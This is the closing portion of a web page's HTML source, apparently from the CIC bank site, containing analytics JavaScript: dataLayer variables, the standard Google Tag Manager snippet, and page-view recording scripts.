var application_name="";if(typeof(product_name)=='undefined')
var product_name="";if(typeof(souscription_etape)=='undefined')
var souscription_etape="";if(typeof(souscription_page_name)=='undefined')
var souscription_page_name="";if(typeof(espacewat)=='undefined')
var espacewat="";if(typeof(env_template)=='undefined'||env_template=="")
var env_template='page';if(typeof(domaine_fonctionnel)=='undefined')
var domaine_fonctionnel="";if(typeof(fonction)=='undefined')
var fonction="";if(typeof(typepage)=='undefined')
var typepage="";if(typeof(kpi)=='undefined')
var kpi="";var type_acces="";if(type_acces!="")
dataLayer.push({'type_acces':type_acces});var clientidentifie='false';var clientreconnu='N';var user_statut='';if(clientidentifie=="false"&&clientreconnu=="N"){user_statut="prospect";}else if(clientidentifie=="false"&&clientreconnu=="Y"){user_statut="client reconnu";}else if(clientidentifie=="true"){user_statut="client authentifie";};if(espacewat!="")
dataLayer.push({'espace':espacewat});if(space!="")
dataLayer.push({'space':space});if(subspace!="")
dataLayer.push({'subspace':subspace});if(application_name!="")
dataLayer.push({'application_name':application_name});if(domaine_fonctionnel!="")
dataLayer.push({'domaine_fonctionnel':domaine_fonctionnel});if(fonction!="")
dataLayer.push({'fonction':fonction});var federation="";if(federation!="")
dataLayer.push({'federation':federation});var caisse="";if(caisse!="")
dataLayer.push({'caisse':caisse});var contratbad="";if(contratbad!="")
dataLayer.push({'contratbad':contratbad});var typeclient="";if(typeclient!="")
dataLayer.push({'typeclient':typeclient});if(clientidentifie!="")
dataLayer.push({'clientidentifie':clientidentifie});if(clientreconnu!="")
dataLayer.push({'clientreconnu':clientreconnu});var alias="";if(alias!="")
dataLayer.push({'alias':alias});var typomarche="";if(typomarche!="")
dataLayer.push({'typomarche':typomarche});var activitebad="";if(activitebad!="")
dataLayer.push({'activitebad':activitebad});var surfacefinanciere="";if(surfacefinanciere!="")
dataLayer.push({'surfacefinanciere':surfacefinanciere});var langue="fr";if(langue!="")
dataLayer.push({'langue':langue});var enviro="PRD";if(enviro!="")
dataLayer.push({'enviro':enviro});var canal="WEB_DESKTOP";if(canal!="")
dataLayer.push({'canal':canal});var sousespaces="Aucun";if(sousespaces!="")
dataLayer.push({'sousespaces':sousespaces});if(typepage!=""){dataLayer.push({'typepage':typepage});}else{dataLayer.push({'typepage':env_template});}
if(kpi!="")
dataLayer.push({'kpi':kpi});var espaceclientreconnu="";if(espaceclientreconnu!="")
dataLayer.push({'espaceclientreconnu':espaceclientreconnu});var offre="";if(offre!="")
dataLayer.push({'offre':offre});if(user_statut!="")
dataLayer.push({'statutclient':user_statut});var usernivauto="";if(usernivauto!="")
dataLayer.push({'usernivauto':usernivauto});var usersubst="";if(usersubst!="")
dataLayer.push({'usersubst':usersubst});var usernivacc="";if(usernivacc!="")
dataLayer.push({'usernivacc':usernivacc});var typeacces="";if(typeacces!="")
dataLayer.push({'typeacces':typeacces});if(url_page!="")
dataLayer.push({'url_page':url_page});if(product_name!="")
dataLayer.push({'product_name':product_name});if(souscription_etape!="")
dataLayer.push({'souscription_etape':souscription_etape});if(souscription_page_name!="")
dataLayer.push({'souscription_page_name':souscription_page_name});var user_ega="";if(user_ega!="")
dataLayer.push({'user_ega':user_ega});var user_dreg="";if(user_dreg!="")
dataLayer.push({'user_dreg':user_dreg});var page_cat1="CIC";if(page_cat1!="")
dataLayer.push({'page_cat1':page_cat1});var page_cat2="";if(page_cat2!="")
dataLayer.push({'page_cat2':page_cat2});var page_cat3="";if(page_cat3!="")
dataLayer.push({'page_cat3':page_cat3});var page_cat4="";if(page_cat4!="")
dataLayer.push({'page_cat4':page_cat4});var page_cat5="";if(page_cat5!="")
dataLayer.push({'page_cat5':page_cat5});if(typeof(offre)=='undefined')
var offre="";if(offre!="")
dataLayer.push({'offre':offre});if(typeof(options)=='undefined')
var options="";if(options!="")
dataLayer.push({'options':options});</script>

<!-- Google Tag Manager -->
<noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-WMXC9XJ"
title="Google Tag Manager" style="display:none;visibility:hidden"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-WMXC9XJ');</script>
<!-- End Google Tag Manager -->



<script type="text/javascript">
var tags = ['OTH','GTM'];
</script>

<!-- fin Web Analytics -->

<!-- Datasinks V1 -->
<script type="text/javascript">
    if (typeof eia === "function") {
        var data = {};
        if (typeof watData !== "undefined") {
            var mapping = {"d1":"espace","d12":"env_langue","d15":"env_espace","d16":"typepage","d18":"statutuser","d19":"substitution_mode","d197":"product_code_promo","d194":"page_cat1","d193":"page_cat2","d192":"page_cat3","d191":"page_cat4","d190":"page_cat5"};
            for (var key in mapping) {
                var wat_key = mapping[key];
                if (watData.hasOwnProperty(wat_key)) {
                    data[key] = watData[wat_key];
                }
            }
        }
        eia("record", "Page Viewed", data);
    }
</script>
<!-- Datasinks V1 -->
<!-- Datasinks V2 -->
<script type="text/javascript">
    if (typeof ds === "function") {
        var ds_data = {};
        if (typeof watData !== "undefined") {
            var mapping = ["espace","env_langue","env_espace","typepage","statutuser","substitution_mode","product_code_promo","page_cat1","page_cat2","page_cat3","page_cat4","page_cat5","application_path"];
            for (var key in mapping) {
                var wat_key = mapping[key];
                if (watData.hasOwnProperty(wat_key)) {
                    ds_data[wat_key] = watData[wat_key];
                }
            }
        }
        page_info = {
            page_current_url: document.location.href.split('?')[0],
            page_source_url: document.referrer.split('?')[0],
            page_path: document.location.pathname,
            page_title: document.title
        };
        ds_data = $.extend(page_info, ds_data);
        ds()("record", "page_viewed", ds_data);
    }
</script>
<!-- Datasinks V2 -->

<!-- ei-msgs-chat -->


<script type="text/javascript" id="">google_tag_manager["GTM-WMXC9XJ"].macro(33).match(google_tag_manager["GTM-WMXC9XJ"].macro(34))||(google_tag_manager["GTM-WMXC9XJ"].macro(35).match("www.cic.fr/")?google_tag_manager["GTM-WMXC9XJ"].macro(36).match("evt_category\x3dmessages_personnalises")?google_tag_manager["GTM-WMXC9XJ"].macro(38)("GAME",google_tag_manager["GTM-WMXC9XJ"].macro(39)):google_tag_manager["GTM-WMXC9XJ"].macro(40).match("/fr/(banque|assurances)/")?google_tag_manager["GTM-WMXC9XJ"].macro(42)("Espace transactionnel",google_tag_manager["GTM-WMXC9XJ"].macro(43)):google_tag_manager["GTM-WMXC9XJ"].macro(49)():google_tag_manager["GTM-WMXC9XJ"].macro(51)("Entr\u00e9e",google_tag_manager["GTM-WMXC9XJ"].macro(52)));</script><script type="text/javascript" id="">Element.prototype.matches||(Element.prototype.matches=Element.prototype.matchesSelector||Element.prototype.mozMatchesSelector||Element.prototype.msMatchesSelector||Element.prototype.oMatchesSelector||Element.prototype.webkitMatchesSelector||function(a){a=(this.document||this.ownerDocument).querySelectorAll(a);for(var b=a.length;0<=--b&&a.item(b)!==this;);return-1<b});</script><script type="text/javascript" id="">var isMarche=-1!==google_tag_manager["GTM-WMXC9XJ"].macro(80).indexOf(google_tag_manager["GTM-WMXC9XJ"].macro(81)(google_tag_manager["GTM-WMXC9XJ"].macro(82)));isMarche&&google_tag_manager["GTM-WMXC9XJ"].macro(83)!==google_tag_manager["GTM-WMXC9XJ"].macro(84)&&(sessionStorage.setItem("lastPageCat1",google_tag_manager["GTM-WMXC9XJ"].macro(85)),sessionStorage.removeItem("lastPageCat2"),sessionStorage.removeItem("lastPage"));</script><script type="text/javascript" id="">var isPageProduit=google_tag_manager["GTM-WMXC9XJ"].macro(86).match("(Produit|Campagne)")||"Notre offre"===google_tag_manager["GTM-WMXC9XJ"].macro(87);isPageProduit&&google_tag_manager["GTM-WMXC9XJ"].macro(88)!==google_tag_manager["GTM-WMXC9XJ"].macro(89)&&sessionStorage.setItem("lastPage",google_tag_manager["GTM-WMXC9XJ"].macro(90));</script></body></html>